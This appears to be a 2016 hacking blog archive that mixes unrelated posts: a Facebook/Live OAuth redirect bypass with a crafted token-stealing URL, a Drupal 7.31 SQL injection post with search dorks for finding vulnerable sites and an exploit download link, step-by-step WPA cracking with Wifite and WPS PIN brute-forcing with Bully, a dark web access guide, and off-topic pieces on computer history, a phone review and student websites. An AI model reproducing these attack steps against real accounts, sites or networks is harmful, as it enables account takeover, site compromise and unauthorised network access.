Saturday, March 26, 2016

NEW FACEBOOK EXPLOIT LEAD TO Authentication BYPASS

Facebook Live Application Authentication bypass


Facebook Live Application Authentication bypass – Bug Bounty POC


Hello Bug Bounty POC viewers.Today we are going to share Facebook Live Application Authentication bypass with you guys .This bug was found by Abdellah Yaala a Security Researcher from Morocco. We’ve taken permission from him to publish this poc on Bug Bounty POC.The finder of this bug reserve the full authority of publish/Unpublished this.So Let’s Start it ðŸ˜‰
There is a Live app on facebook from which user can connect there live account with Facebook when a user wants to import his contacts or reset his fb password using hotmail / outlook he visits the following url to authorize the request
https://login.live.com/oauth20_authorize.srf?client_id=0000000044002503&response_type=code&redirect_url=https://wwww.facebook.com/accept_token.php%3Fapi_ver%3Dwave5%26csrf%3DAY4SvijoflL0B8zdxFgngr88d1tg-qTPSqgb-3aYo-ER5rDcFXSfuBDr4Q4ebXs%26appdata%3D%257B%2522use_case%2522%253A1%252c%2522flow%2522%253A22%%252c%2522

As u can see the redirect_uri parameter of the url points to
https://facebook.com/accept_token.php?api_ver%3Dwave5%26csrf%3Day4Svijofll0b8ezdxf9gngr88ditg-qtpsqgb-3ayqo-er5rdcfxsfubdr4q41xbxs%26appdata%3d%257b%2522domain_id%2522%253a4%252c%2522tracked_params%2522%255b%255d%2522%257d
Now here’s the bug .. i can change that redirect_uri parameter and get the token of victim
the bypass uri is
https://www.facebook.com/ACCEPT_TOKEN.PHP?/!#/n/?https://apps.facebook.com/app_id?

Example –  which link i send to user :
https://login.live.com/oauth_author.srf?client_id=0000000044002503&response_type=code&redirect_url=facebook.com/accept_token.php%3f%2f%21%23%2fn%3fapps.facebook.com%2f935728666477748%2f&locale=en-us&scope=wli.contacts_email&display=popup&swu=1&username=ocpdomaine%40hotmail.com


so when this malicious crafted url is sent to the victim i can obtain the victims access token using which i can read the victims inbox by changing the scope parameter to
scope=https://outlookoffice.ocm/Mail.Read

Facebook Live Application Authentication bypass  – Reply of Facebook :
Facebook Live Application Authentication bypass
Facebook Live Application Authentication bypass

Facebook Live Application Authentication bypass – Video POC :




 

Timeline
———-
Oct 25, 2015 – Report Sent
Oct 29, 2015 – facebook need proof of concept
Oct 30, 2015 – prof concept sent
Nov 4, 2015 at 00h15 GMT – Escalation by Facebook
Nov 4, 2015 at 2h25 GMT –Confirmed fix by Facebook
Nov 6, 2015 – Bounty Awarded of $7500 by Facebook

Friday, March 25, 2016

Hack Drupal 7.31 With pre Auth SQL Injection Vulnerability

Introduction

Drupal is an open source content management platform powering millions of websites and applications.It’s built, used, and supported by an active and diverse community of people around the world.
Drupal 7 is used by a vast number of sites and all of them are vulnerable.
During a sourcecode audit for a customer we found an SQL Injection Vulnerability in Drupal's core handling of SQL queries, which we disclosed to the vendor. With this bug an attacker can gain full control over all Drupal sites (Admin privileges), without knowledge of internals or authentication on the site. He can even execute PHP Code without leaving a trace in any log.
The Bug was introduced in early 2011 and stayed well hidden in the core framework.

We will wait until enough sites had time to update before we release a PoC, since this is a severe bug, which allows an attacker to execute arbitrary code with only one HTTP request and no knowledge of the site whatsoever.

The Vulnerability

All database queries in Drupal are handled via prepared statements. Placeholders are used in the SQL queries to indicate where user input should be included:
SELECT * FROM {users} WHERE name IN (:name_0, :name_1)
This prepared statement is called with a binding to variables for :name_0 and :name_1. This way an attacker cannot alter the SQL query, since he cannot inject values into the prepared statement.The number of placeholders has to be correct. Therefore Drupal uses a function to expand :name to :name_0, :name_1. This function handles the arrays incorrectly and expands the array to :name_$key0, :name_$key1. If the attacker can control the $key0 and $key1 he can manipulate the SQL query to look like this:
SELECT * FROM {users} WHERE name IN (:name_test) OR name = 'Admin' -- , :name_test)
which results in an SQL injection, where the attacker has full control over the database. He can dump all data, delete the whole database or create new users for example.
If the user can control the database, he can insert values to gain remote code execution on the web server by using Drupal features with callbacks.

DORK TO FIND VUL. WEBSITE
-----------------------------------------------
inurl:drupal7/?q=
inurl:?q=node/
inurl:?q=node/1
inurl:?q=user/login
inurl:?q=user/register
intext:Powered by drupal
intitle: Drupal | inurl:?q=node/ 
 


Exploit Available Here
=> http://www.mediafire.com/download/fo06tp37racktd2/drupal+exploit.py

How to Crack WPA/WPA2 with Wifite



Hello Guys, I’m going to explain how to perform a dictionary attack on a WPA/WPA2 protected network with Wifite. Please note that this doesn’t work with WPA Enterprise For that end, you’d have to use an Evil Twin to get the “Enterprise” auth attempt, and then crack it.


But don’t worry, Enterprise isn’t common in many corporations, and I still haven’t seen it on any home network. That being said, let’s get started.
Step 1: Get Ready Your Dictionary File


First, we’re gonna need a dictionary, to perform the dictionary attack. If the network you’re attacking has WPS enabled, you may attempt to get the password that way first.

In Kali, you have a nice wordlist that comes bundled within your installation/live usb. It’s located in/usr/share/wordlists, but it comes compressed in .gz format (at least in the live version).

To get it ready for the attack, we need to type:

gzip -d /usr/share/wordlists/rockyou.txt.gz

And within seconds it’ll be extracted and ready to use.

Backtrack has them located in /pentest/passwords/wordlists. It has one that’s called darkc0de.lst along with the rockyou.txt one.

You can use them simply copying one of this after the ‘-dict’ option.

/pentest/passwords/wordlists/rockyou.txt
/pentest/passwords/wordlists/darkc0de.lst

For any other distros, search for “download wordlist rockyou” or “download wordlist darkc0de”, or just “download wordlist” in DuckDuckGo. It gives more precise results than Google for this kind of stuff.

For the rest of this, I’ll assume that you’re using Kali.
Step 2: Launch Wifite

To launch Wifite, you must be running with root permissions.

In a live Kali boot, you are logged on by default with the root user. If you let it running for a while (while cracking with the dictionary, pressumably) and it asks for a password to return to the session, it’s ‘toor’ (root backwards).

Same for BackTrack (confirmation needed), and for other distros you can gain root access by typing “su” or “sudo su” and entering the password. The first command requires you to know root’s password, and the second your current account’s and it must have root privileges.

TL;DR? Okay, you just want the command? Here it is!

wifite -mac -aircrack -dict /usr/share/wordlists/rockyou.txt

-mac | Anonymizes your MAC Address by randomizing it (it mustn’t be set to monitor mode, or this command won’t work).

-aircrack | Tells Wifite we’ll be doing an Aircrack only attack.

-dict | Select a dictionary to use for cracking the password after capturing the handshake, otherwise you’ll get the ‘.cap’ file and Wifite will terminate.


I have it located in a different folder because I’m not running Kali, but it’s pretty much the same.
Step 3: Select Your Wireless Adapter and Your Target

If you have a laptop, you’ll probably have to choose which adapter to use, if you have an external USB adapter. Please note that you’ll need acompatible adapter that’s able to inject packets and enter into promiscuous mode (monitor mode), or this won’t work.


If prompted, we select our adapter choosing the number Wifite has assigned it. In my case, I’ll type ‘1’, because that’s mine. One good indicator for knowing which one it is, is reading that name to the left ofphy. For example, I have one that says ‘usb’ in it, and one that doesn’t. And yep, I have it plugged to USB, so that one’s it.


Now we’ll see a list of wireless networks, and if we let it run, it will eventually display ‘client’ or ‘clients’ at the top right of the network info, showing that it has a client (or more) connected to it.

To stop the scan, press Ctrl+C. I’ll choose “Casa” (spanish for House).

Step 4: Sit and Wait

If the network you’re attempting to crack has WPS enabled, it’ll start cracking it like that first. To stop it, just press Ctrl+C

Now it will attempt to capture the handshake for a few minutes.

If no clients are connected, it’ll send a general deauth to the wireless adapter, so that clients may show up.

If it detects a client connected to the network, it’ll tell you it’s MAC Address, and proceed to send targeted deauths to that client.

When it succeeds deauthenticating a client (who has re-connect enabled by default), or a new client connects to the network, hopefully it will capture the handshake, and it’ll start attempting to crack it withaircrack-ng and the dictionary file you gave it.

If the passphrase is any of the words contained in that dictionary, it’ll stop and show it on screen. Otherwise, it’ll run through the whole dictionary, and say it couldn’t find the key. But it has a nice success rate.


I used my country in lowercase letters as the passphrase (argentina), and as it’s along the first words in this dictionary, it took only one second to crack it. For you it may take over an hour or two, depending on your processing power and if the passphrase is near the beginning or the end of the list.
Wifite Succeded but Failed!


If it failed, you still get the ‘.cap’ file (hopefully not empty).

You can use that file with the same dictionary (or others) with aircrack-ng, using this command:

aircrack-ng -w <location of dictionary> <location of your .cap file>

In Kali live, ‘.cap’ files get saved into a folder named ‘hs’ of the folder you’re standing.

After Wifite has ended, type:

ls ./hs

To see you ‘.cap’ files and other files for cracking.


Some More Words



Should I write a guide on how to install this script on a non-kali machine? It’s pretty illuminating about which programs it uses for which purpose…

Anyways, reviews, suggestions, questions are all welcome  Keep making this forum the great thing it is!

Breaking a WPS PIN to Get the Password with Bully

Hello strangers,welcome to my blog  lets start Like anything in life, there are multiple ways of getting a hack done. In fact, good hackers usually have many tricks up their sleeve to hack into a system. If they didn’t, they would not usually be successful. No hack works on every system and no hack works all of the time.



I have demonstrated many ways to hack Wi-Fi here on Null Byte, including cracking WEP and WPA2 passwords and creating an Evil Twin and Rogue AP.

A few years back, Alex Long demonstrated how to use Reaver to hack the WPS PIN on those systems with old firmware and WPS enabled. Recently, a new WPS-hacking tool has appeared on the market and is included in ourKali hacking distribution. It’s name, appropriately, is Bully.
Why WPS Is So Vulnerable

WPS stands for Wi-Fi Protected Setup and was designed to make setting a secure AP simpler for the average homeowner. First introduced in 2006, by 2011 it was discovered that it had a serious design flaw. The WPS PIN could be brute-forced rather simply.

With only 7 unknown digits in the PIN, there are just 9,999,999 possibilities, and most systems can attempt that many combinations in a few hours. Once the WPS PIN is discovered, the user can use that PIN to find the WPA2 preshared key (password). Since a brute-force attack against a WPA2 protected AP can take hours to days, if this feature is enabled on the AP and not upgraded, it can be a much faster route to getting the PSK.
The Keys to Success

It’s important to note, though, that new APs no longer have this vulnerability. This attack will only work on APs sold during that window of 2006 and early 2012. Since many families keep their APs for many years, there are still many of these vulnerable ones around.

If you aren’t familiar with wireless hacking, I strongly suggest that you read my introduction on the Aircrack-ng suite of tools. In addition, make certain that you have an Aircrack-ng compatible wireless card, otherwise this will simply be an exercise in frustration.
Step 1: Fire Up Kali

Let’s start by firing our favorite hacking Linux distribution, Kali. Then open a terminal that looks like this:


To make certain we have some wireless connections and their designation, we can type:
kali > iwconfig


As we can see, this system has a wireless connection designated wlan0. Yours may be different, so make certain to check.
Step 2: Put Your Wi-Fi Adapter in Monitor Mode

The next step is to put your Wi-Fi adapter in monitor mode. This is similar to promiscuous mode on a wired connection. In other words, it enables us to see all the packets passing through the air past our wireless adapter. We can use one of the tools from the Aircrack-ng suite, Airmon-ng, to accomplish this task.
kali > airmon-ng start wlan0


Next, we need to use Airdump-ng to see the info on the wireless AP around us.
kali > airdump-ng mon0


As you can see, there are several APs visible to us. I’m interested in the first one: “Mandela2.” We will need its BSSID (MAC address), its channel, and its SSID to be able to crack its WPS PIN.
Step 3: Use Airdump-Ng to Get the Necessary Info

Finally, all we need to do is to put this info into our Bully command.
kali > bully mon0 -b 00:25:9C:97:4F:48 -e Mandela2 -c 9

Let’s break down that command to see what’s happening.
mon0 is the name of the wireless adapter in monitor mode.
–b 00:25:9C:97:4F:48 is the BSSID of the vulnerable AP.
-e Mandela2 is the SSID of the AP.
-c 9 is the channel the AP is broadcasting on.

All of this information is available in the screen above with Airdump-ng.

Step 4: Start Bully

When we hit enter, Bully will start to try to crack the WPS PIN.


Now, if this AP is vulnerable to this attack, bully will spit out the WPS PIN and the AP password within 3 to 5 hours.

What is Deep Web and How To Access The Dark Web



Disclaimer
This article will show you how to access the Deep Web. There is some awesome stuff on the deep web as well as some not so awesome stuff. Be careful when browsing. Unlike the internet you use everyday, this portion of the web is largely unregulated and as such is host to the full-spectrum of what humans are capable of, from the incredible to the horrible. Note that I do not endorse any of the sites here, browse at your own risk.

Deep Web
the part of the World Wide Web that is not discoverable by means of standard search engines, including password-protected or dynamic pages and encrypted networks.
“the biggest weakness of the Deep Web is also its greatest strength: it’s really hard to find anything”

The Dark Web
So you’ve heard of the dark web before but aren’t quite sure what it is, or what to make of it. You may have also heard terms thrown out there like the deep internet, dark internet, and surface internet. These all refer to different yet sometimes overlapping spaces on the internet.

Surface Internet:

The surface internet refers to the internet most people access everyday. It’s largely where sites like Google, Facebook, YouTube, and Yahoo exist.

Deep Web:

The deep internet is the portion of the internet that is typically not indexed by search engines (i.e. Google, Bing).

Dark Internet:

The dark internet refers to web addresses and network hosts that no one is able to reach.

Dark Web:

Dark Web refers to the portion of the internet that people intentionally bury and is typically only accessible through the use of a special browser.

A lot of people use these terms interchangeably but they do in fact refer to different areas of the internet.

What I’ll be showing you here is how to access the dark web through the Tor browser bundle. The dark web has been the home to sites like The Silk Road Marketplace, a site where users often trade Bitcoin for drugs. Yet the dark web also plays an important role for political dissidents and the privacy conscious. Even Facebook recently set up a way to access their site via Tor, making Facebook one of the newest additions to the dark web.

Meet Your New Browser: Tor
So how do you get to the dark web?

Well first you’re going to need to download the Tor Browser Bundle from torproject.org. The Tor Browser Bundle contains a version of Firefox along with some additional software that keeps websites from seeing your IP address and other information as you browse the web. Versions of the Tor browser have been made for just about every operating system, from Windows to Mac to Linux and Android, so you shouldn’t have any problems there. I’m not going to go into the details of how Tor works here, for that I suggest you check out this overview of Tor from TorProject.org.

Once you have Tor downloaded go ahead and start it by running the file that you downloaded. For Windows users this will be a .exe file that will install the Tor browser bundle for you. For Linux users you’ll need to run the start-tor-browser file found in the folder that you just downloaded.

After you’ve downloaded and installed Tor just start the program. Soon you’ll see Tor’s version of Firefox pop up with a window that should look like this:



You can also use the Tor browser to visit websites anonymously. One of the simplest uses of Tor is to check how web sites render or display from different areas of the world. For instance, if you go to Google.com in Tor you’ll more than likely find yourself at the home page for another country’s version of Google.

Getting To The Dark Web
Once you are up and running with Tor the next step is to visit our first .onion sites. The .onion suffix is sort of like .com or .net. Sites that use the .onion suffix are largely what make up the dark web and are only accessible through the use of the Tor browser.

The first thing I’m going to have you do is to go to this article in Tor. Just copy and past the address into the Tor Browser and you should see it render just like here. We’re doing this so that you can click directly on the .onion addresses below and not have to copy and past them every time.

Note: When you navigate to this site you will see a warning sign saying that this site is trying to extract HTML5 canvas data…. This is from the code used to generate the bitcoin QR codes on the side of the page. You probably won’t even use those codes so feel free to click not now and not allow this site access. The only functionality you’ll be missing is the QR codes on the site. Also, if you’re not comfortable with this then just copy and paste the links from here into Tor.

How To Access The Dark Web

It should look like this:



Usually when you’re looking for something online you start with a search engine, so that’s what we’re going to do next.

Tor Search
Tor Search is a crude search engine for the dark web. To use it just type in kbhpodhnfxl3clb4.onion to your address bar like you would a normal site.

Tor Search (.onion link)

http://kbhpodhnfxl3clb4.onion

You should see something like this pop up on your browser:



If you get a web page from your ISP saying that the website wasn’t found and offering suggestions, then you probably just typed or entered the address into your regular web browser. Make sure you’re using the Tor browser you downloaded and installed earlier.

To test Tor Search enter the term bitcoin and you’ll see results for bitcoin mining pools among other things.



All You’re Wiki
So Tor Search was great and all, but let’s be honest, it isn’t quite the portal to the dark web you were looking for. In that case you might like this Wiki built specifically for .onion sites. It is a bit cleaner than some of the other places you might come across down there and lists a lot of useful Tor sites.

All You’re Wiki (.onion link)

http://allyour4nert7pkh.onion/wiki/index.php?title=Main_Page



Facebook
Now let’s try a site you might be more familiar with, Facebook. Late last year Facebook announced that they would be opening a .onionportal to their site (https://www.facebookcorewwwi.onion/).

Facebook (.onion link)

https://www.facebookcorewwwi.onion/

Now, you could access Facebook through their normal Facebook.com url, but you could also try through their new .onion url. For the record I have yet to use this version of Facebook and probably won’t. Still, navigating to their .onion url should look something like this:



DuckDuckGo
Now let’s say that you don’t want to search the dark web, but you want to search the surface web from the dark web. Well you’re in luck as there is a .onion portal to search engine DuckDuckGo.

DuckDuckGo (.onion link)

http://3g2upl4pq6kufc4m.onion/



Other Methods For Getting To The Dark Web
There is a handy site that acts as a layer between the surface internet and the dark web called Tor2Web.org. If you want to access a site on the Tor network but for whatever reason don’t care to use the Tor browser then you can use this site. Just replace the .onion suffix of the tor/onion site with .tor2web.org.

Tor2Web.org

Surface Internet Communities For Those Interested In The Dark Web
At the moment there are a number of subreddits and other sites that are the place to go if you’re interested in learning about the dark web and .onion sites but don’t actually want to poke around there.

Here is a short list:

/r/deepweb – general deep web dicussion

TheHiddenWiki.org – a wiki of .onion links

/r/darknetmarkets – discussion about dark web markets

/r/AgMarketplace – discussion about the Agora marketplace

/r/darknetplan – building a decentralized internet

Conclusions
Well there you have it, you are now fully able to access the dark web and visit .onion sites like a pro! You’ll find all sorts of sites down here, from sites for political organization to digital marketplaces to bitcoin mining pools. Now you might ask, but why would I need this? Well there are a number of possible reasons. For a lot of us, myself included, I’m curious about the workings of the dark web. The idea that another internet exists that is beyond the reach of a lot of law enforcement is both incredibly intriguing and somewhat terrifying.

Maybe you’re a journalist looking to dig up some information, or a political dissident. Maybe you’re an intel analyst looking form information about a criminal or terrorist organization, maybe you just like your privacy and want a more anonymous internet where your every move isn’t being recorded and marketed to. Or maybe you’re just curious and want to see what this wild-west of the internet is doing. Either way, thanks for reading and stay safe down here!

If you have any questions or suggestions be sure to leave them in the comments and I’ll get back to you with a response.

Computer History

The first computers were people! That is, electronic computers (and the earlier mechanical computers) were given this name because they performed the work that had previously been assigned to people. "Computer" was originally a job title: it was used to describe those human beings (predominantly women) whose job it was to perform the repetitive calculations required to compute such things as navigational tables, tide charts, and planetary positions for astronomical almanacs. Imagine you had a job where hour after hour, day after day, you were to do nothing but compute multiplications. Boredom would quickly set in, leading to carelessness, leading to mistakes. And even on your best days you wouldn't be producing answers very fast. Therefore, inventors have been searching for hundreds of years for a way to mechanize (that is, find a mechanism that can perform) this task.


This picture shows what were known as "counting tables" [photo courtesy IBM]


A typical computer operation back when computers were people.
The abacus was an early aid for mathematical computations. Its only value is that it aids the memory of the human performing the calculation. A skilled abacus operator can work on addition and subtraction problems at the speed of a person equipped with a hand calculator (multiplication and division are slower). The abacus is often wrongly attributed to China. In fact, the oldest surviving abacus was used in 300 B.C. by the Babylonians. The abacus is still in use today, principally in the far east. A modern abacus consists of rings that slide over rods, but the older one pictured below dates from the time when pebbles were used for counting (the word "calculus" comes from the Latin word for pebble).


A very old abacus


A more modern abacus. Note how the abacus is really just a representation of the human fingers: the 5 lower rings on each rod represent the 5 fingers and the 2 upper rings represent the 2 hands.
In 1617 an eccentric (some say mad) Scotsman named John Napier invented logarithms, which are a technology that allows multiplication to be performed via addition. The magic ingredient is the logarithm of each operand, which was originally obtained from a printed table. But Napier also invented an alternative to tables, where the logarithm values were carved on ivory sticks which are now called Napier's Bones.


An original set of Napier's Bones [photo courtesy IBM]


A more modern set of Napier's Bones
Napier's invention led directly to the slide rule, first built in England in 1632 and still in use in the 1960's by the NASA engineers of the Mercury, Gemini, and Apollo programs which landed men on the moon.


A slide rule
Leonardo da Vinci (1452-1519) made drawings of gear-driven calculating machines but apparently never built any.


A Leonardo da Vinci drawing showing gears arranged for computing
The first gear-driven calculating machine to actually be built was probably the calculating clock, so named by its inventor, the German professor Wilhelm Schickard in 1623. This device got little publicity because Schickard died soon afterward in the bubonic plague.


Schickard's Calculating Clock
In 1642 Blaise Pascal, at age 19, invented the Pascaline as an aid for his father who was a tax collector. Pascal built 50 of this gear-driven one-function calculator (it could only add) but couldn't sell many because of their exorbitant cost and because they really weren't that accurate (at that time it was not possible to fabricate gears with the required precision). Up until the present age when car dashboards went digital, the odometer portion of a car's speedometer used the very same mechanism as the Pascaline to increment the next wheel after each full revolution of the prior wheel. Pascal was a child prodigy. At the age of 12, he was discovered doing his version of Euclid's thirty-second proposition on the kitchen floor. Pascal went on to invent probability theory, the hydraulic press, and the syringe. Shown below is an 8 digit version of the Pascaline, and two views of a 6 digit version:


Pascal's Pascaline [photo © 2002 IEEE]


A 6 digit model for those who couldn't afford the 8 digit model


A Pascaline opened up so you can observe the gears and cylinders which rotated to display the numerical result

The computer as we know it today had its beginning with a 19th century English mathematics professor name Charles Babbage.
He designed the Analytical Engine and it was this design that the basic framework of the computers of today are based on.
Generally speaking, computers can be classified into three generations. Each generation lasted for a certain period of
time,and each gave us either a new and improved computer or an improvement to the existing computer.
First generation: 1937 – 1946 - In 1937 the first electronic digital computer was built by Dr. John V. Atanasoff and Clifford Berry. It was called the Atanasoff-Berry Computer (ABC). In 1943 an electronic computer name the Colossus was built for the military. Other developments continued until in 1946 the first general– purpose digital computer, the Electronic Numerical Integrator and Computer (ENIAC) was built. It is said that this computer weighed 30 tons, and had 18,000 vacuum tubes which was used for processing. When this computer was turned on for the first time lights dim in sections of Philadelphia. Computers of this generation could only perform single task, and they had no operating system.
Second generation: 1947 – 1962 - This generation of computers used transistors instead of vacuum tubes which were more reliable. In 1951 the first computer for commercial use was introduced to the public; the Universal Automatic Computer (UNIVAC 1). In 1953 the International Business Machine (IBM) 650 and 700 series computers made their mark in the computer world. During this generation of computers over 100 computer programming languages were developed, computers had memory and operating systems. Storage media such as tape and disk were in use also were printers for output.
Third generation: 1963 - present - The invention of integrated circuit brought us the third generation of computers. With this invention computers became smaller, more powerful more reliable and they are able to run many different programs at the same time. In1980 Microsoft Disk Operating System (MS-Dos) was born and in 1981 IBM introduced the personal computer (PC) for home and office use. Three years later Apple gave us the Macintosh computer with its icon driven interface and the 90s gave us Windows operating system.
As a result of the various improvements to the development of the computer we have seen the computer being used in all areas of life. It is a very useful tool that will continue to experience new development as time passes.

Coolpad Note 3 Review

Hello friends this is Tanmay, Your tech buddy.

 This article in an review of a cool smartphone which is launched on  October 2015. I have this phone in my home and i'am eagerly waiting to write a review on the phone. so, i think i have the phone with me from early 6 months and the merit of this phone is due to its very good specs which make this phone durable and stable ie. it cannot be hang easily even also not in excessive use.

CoolPad is only officially launched on a famous ECommerce website named amazon and it is available to buy with several payment modes such as COD,Net Banking,Credit-Debit Cards Etc.






 [NOTE] Images are not captured by me, just taken at random from google images.


[!] Now lets talk about its features

 1. It has a fast and stable fingerprint sensor.
 2. It has a very durable and good battery life as compared to other phones in same money range.
 3. It has a good selfi camera which shoot good pics.
 4. Coolpad note 3 Provides CoolUI as base rom which is stable and they keep update it.
 5. According to coolpad official website they are going to launch marshmallow update in 2-3 months
 And Many More

Now here is some detailed information about the PHONE

Release dateJanuary 2016
Form factorTouchscreen
Dimensions (mm)140.80 x 70.40 x 8.90
Weight (g)152.00
Battery capacity (mAh)2500
Removable batteryNo
ColoursWhite, Black
SAR value0.24
Screen size (inches)5.00
TouchscreenYes
Resolution720x1280 pixels
Processor1.3GHz  quad-core
Processor makeMediaTek MT6735
RAM3GB
Internal storage16GB
Expandable storageYes
Expandable storage typemicroSD
Expandable storage up to (GB)32
Rear camera13-megapixel
FlashYes
Front camera5-megapixel
Operating SystemAndroid 5.1
SkinCool UI 6.0
Wi-FiYes
Wi-Fi standards supported802.11 b/ g/ n
GPSYes
BluetoothYes, v 4.00
NFCNo
InfraredNo
USB OTGYes
Headphones3.5mm
FMYes
Number of SIMs2
SIM 1
SIM TypeMicro-SIM
GSM/ CDMAGSM
3GYes
4G/ LTEYes
Supports 4G in India (Band 40)Yes
SIM 2
SIM TypeMicro-SIM
GSM/ CDMAGSM
3GYes
4G/ LTEYes
Supports 4G in India (Band 40)Yes
Compass/ MagnetometerYes
Proximity sensorYes
AccelerometerYes
Ambient light sensorYes
GyroscopeYes
BarometerNo
Temperature sensorNo













If you are planning to buy this phone then its very good phone according to me its worth the cost tag of 9k.

Hope you enjoyed reading my article and if you have any query or suggestion please do post it in comment section below :)





Websites Which every student must visit

Hello Mates,

So, i think its a very interesting article for each and every student.

[!] I'am not a copier, I actually do research on cool topics to provide you good quality material :)


This is where the internet steps in, a realm of student resources with bountiful information about anything, where you can learn the things your parents never taught you (or that you weren’t interested in learning at the time), such as how to budget your money, how to arrange an overdraft with your bank, and how to iron your clothes without leaving an iron-shaped pattern. In short, all the student resources you could ever possibly need are available online.
Below is a categorized list of useful student websites and online resources that will help to make student life that little bit easier from day one.

General websites for students

LifeHacker aims to help its users out with life in the modern world. Popular tags include ‘Productivity’, ‘Money’ and ‘DIY’.
Although essentially one of many time-wasting student websites, MentalFloss is good for learning interesting facts from around the world, covering topics such as food, culture and science. Admittedly, its main function may be as a procrastination aid, but you should still learn something!  
This student resource offers an alternative to TV (and, unfortunately, studying), hosting randomized videos on interesting scientific topics.
This site tells you the best times to go to bed if you have to be up at a certain hour – a very useful tool within student life. Taking into account regular sleep cycles, Sleepyti.me can help if you suffer from grogginess in the mornings.
If you struggle to stay away from social media when you’re meant to be studying, use KeepMeOut to block certain distracting websites.

Educational websites for students

You’ve probably heard of Reddit, but have you heard of UReddit? UReddit hosts courses and lessons created by the public and can help users to learn languages, scientific principles or even PHP programming.
7.  EdX.org
Edx is one of the world’s leading MOOC platforms. MOOCs (massive open online courses) are offered for free to anyone wishing to learn. Other major MOOC providers include: Coursera.orgUdacity.com and AcademicEarth.org.

Cooking websites for students

Cooklet is a place to go for foodies who want to show off their recipes or for those who want to be inspired by other foodies. Like Instagram but solely for food.
RecipePuppy allows you to search for recipes based on the ingredients you already have at home. Lazy students, rejoice.
This is one of the most useful online student resources if you like making and fixing things yourself. You can learn anything from how to make spaghetti ice-cream to how fix a broken shelf.

Health websites for students

This guide will be a lifesaver throughout student life for times when you’re feeling wrung out, stressed or ill. Whatever your ailments, visit this resource to find out what foods to eat to build your immunity and vitality back up.
12.  WebMD.com
WebMD allows you to check your current health status using its ‘symptom checker’. Although this resource is great for hypochondriacs, however, it doesn’t replace the knowledge of a real doctor – go offline and visit your university’s health center if you’re really concerned.
13.  NHS.uk
The website of the UK’s National Health Service provides information on all kinds of illnesses, conditions, diseases and treatments. The site also gives comprehensive information on sexual health.
DontPassItOn provides free chlamydia and gonorrhea testing kits by post to UK citizens aged 16-24.
Sexual health advice and resources for those based in the US.

Shopping & selling websites for students

16.  Ebay.com
Well-established consumer-to-consumer site Ebay allows you to buy, sell or auction off almost anything, including clothing, electronic devices and antiques. Could come in handy if your student budget needs a boost, or if you want to find some bargains.
The Book Pond allows you to sell your old academic textbooks or buy the ones you need from other students who are ready to pass them on.
18.  Amazon.com
Amazon is another online retailer where you can find good prices on books, e-books and textbooks. However, its critics say it’s damaging to independent bookstores, so you may want to consider using your local store instead of always shopping online.
19.  Gumtree.com
Gumtree advertises jobs, second-hand goods, properties and services for people around the UK. If you’re a student in the UK, it can be a good place to search for part-time job opportunities, look for accommodation, sell things you don’t need any more, or even swap goods or skills.
The global version of Gumtree, Craigslist is big in the US and has many city/area divisions so you can find listings close to you.
This online platform allows you to give away your unwanted things or get your hands on what other people are giving away. Handy for furniture and general bric-a-brac.

Money-saving websites for students

22.  Groupon.com
Groupon offers daily deals on things such as spa days, fancy restaurants and city breaks. Not exactly the essentials of student life, but a good way to treat yourself at the end of a stressful exam period, perhaps.
MoneySavingExpert has advice on everything from cheap flights to the best bank interest rates, helping your student budget stretch further.
24.  Mint.com
Free to use, Mint can help you organize your finances and track your spending.
MyVoucherCodes offers vouchers and discounts for a huge number of retail stores and restaurants within the UK. In you are in the US, RetailMeNot is the place to go.
26.  UniDays.com
Just one of many student websites offering discounts, UniDays lists thousands of student discounts and offers around the globe. It’s free to join and also available as an app.
WiseBread is dedicated to living well on a tight budget – whether you’re a student or just trying to get more for your money. It offers advice on everything from debt management to growing your own fruit and vegetables.

Other useful resources for students

An offshoot of Rap Genius, Lit Genius is a place where scholars have formed a community to annotate poetry and literature, both classic and recent. Extremely helpful for English literature students.
29.  TED.com
TED hosts thought-provoking talks given at events all over the world on the core topics of technology, entertainment and design – but in fact covering pretty much every aspect of human experience. The TED site is where you can find all the videos of these talks. Another good procrastination device, but you may also find some inspiration for your next essay.
Although your tutors will tell you never to reference Wikipedia in assignments, the collaboratively edited encyclopedia project can be a very useful tool for early-stage research into your assignment or project.
31.  Bartleby.com
Bartleby publishes classic literature, poetry, non-fiction and reference texts free of charge.
Similarly, Project Gutenberg provides free online access to texts whose copyright has expired; so far it’s digitized more than 45,000 texts.
33.  TopUniversities.com
Finally, don’t forget to check out all the student resources we have right here at TopUniversities.com, including a blogging communitystudent forumsuniversity rankingscountry guidescourse guides, and advice on all aspects of student life – from scholarships and applications to studying abroad andcareer planning.
What other student websites have you found useful? Share your recommendations in the comments below.

For More Cool Stuff Stay Tuned to my blog and if possible then do follow me :)